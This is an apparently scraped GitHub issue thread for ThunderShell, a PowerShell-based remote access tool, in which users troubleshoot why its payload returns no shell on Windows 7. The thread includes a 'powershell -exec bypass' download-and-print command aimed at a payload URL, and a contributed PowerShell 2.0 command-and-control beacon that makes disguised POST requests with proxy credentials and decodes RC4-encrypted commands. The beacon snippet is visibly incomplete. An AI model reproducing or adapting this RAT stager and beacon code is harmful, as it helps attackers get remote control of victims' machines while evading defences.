Mr-Un1k0d3r / ThunderShell

Python / C# Unmanaged PowerShell based RAT
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Error ? #4

Closed Souhardya closed 6 years ago

Souhardya commented 6 years ago

Sorry bout this bit lame tho :- Getting this error while executing in my VM :)

Unexpected token ':$($Domain)\$($env:username)' in expression or statement. At line:19 char:59

The term 'PS-RemoteShell' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:1 char:130

Can you please point out if I am missing something ?

Thanks in advance :) Always been a huge admirer of your codes

Mind0xP commented 6 years ago

That's the same error I'm getting...

Mr-Un1k0d3r commented 6 years ago

You are going to provide me more information.

If you run the following command powershell -exec bypass Write-Output (New-Object Net.WebClient).DownloadString('http://yourpayload/path'); does it show the powershell script?

If it doesn't your path is not good. The error "The term 'PS-RemoteShell' is not recognized as the name of a cmdlet" is caused when the script was not properly loaded / not found.

Mind0xP commented 6 years ago

Hi, I have just moved "PS-RemoteShell.ps1" to the download folder and run the command you gave me. got this output:

screen shot 2017-12-13 at 4 52 52 pm
Mr-Un1k0d3r commented 6 years ago

i've seen cases where it generate an error but it actually work even if it throw an error. Can you confirm that script is not running afterward?

We are tracking down the reason why it's displaying errors like that but still execute just fine

Mind0xP commented 6 years ago

well, I'm not getting any shell back, tried few windows 7 machines with a stable connection, none worked.

GILoe commented 6 years ago

tried few windows 7 machines

PS-RemoteShell.ps1 uses Invoke-WebRequest cmdlet, that is powershell v3.0+, which is NOT the default one on Windows 7, that come with powershell v2.0. That along the fact that we reset the $error variable, hence we see no errors printed.

You can replace the aforementioned cmdlet by creating and customising an instance of [System.Net.WebRequest], if you need to work on windows 7. [done that]

Mr-Un1k0d3r commented 6 years ago

Hi it was originally design to avoid using System.Net.WebRequest but I guess I can make a PS 2 switch in the code to add support for PS 2.

Also thanks for pointing out the issue with the $error been reset I'll address that too.

GILoe commented 6 years ago

Unfortunately I found no other way for PS 2 other than [System.Net.WebRequest]. If it is of any convinience :

Try {
    $request = [System.Net.WebRequest]::Create($Url)
    $request.Method = "POST"
    $request.UserAgent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
    $request.Timeout = 10000 #milliseconds
    $request.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
        $requestStream = $request.GetRequestStream()
        $streamWriter = New-Object System.IO.StreamWriter($requestStream)
        if ($null -ne $streamWriter) { $streamWriter.Dispose() }
        if ($null -ne $requestStream) { $requestStream.Dispose() }
    $resp = $request.GetResponse().getResponseStream()
    $reader = New-Object System.IO.StreamReader($resp)
    $Data = $reader.ReadToEnd()
    #$Data = Invoke-WebRequest -Uri $Url -Method POST -Body $BodyData -UserAgent "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" -TimeoutSec 10 -UseBasicParsing
    $Cmd = RC4-DecodeBase64 -Buffer $Data -Key $Key
Catch {
      $Cmd = ""
Finally {
          $request.ServicePoint.CloseConnectionGroup("") | out-null
Mr-Un1k0d3r commented 6 years ago

I added a check and the RAT now support both Invoke-WebRequest and [System.Net.WebRequest]

GILoe commented 6 years ago

Sorry for the long absence. Being trying to make your updated stager.ps1 work on a windows 7 machine (powershell 2.0) with no success. Same as before, no error but no functionality as well.

[Strange that powershell 2.0 does not throw any exceptions on this, messed up microsoft libraries maybe?]

Mr-Un1k0d3r commented 6 years ago

It is kind of hard to troubleshoot your configuration but it should work. Maybe you can add verbose error and try / catch to try to grab the potential error.

Also make sure that your python server configuration match the one you used when you run the powershell script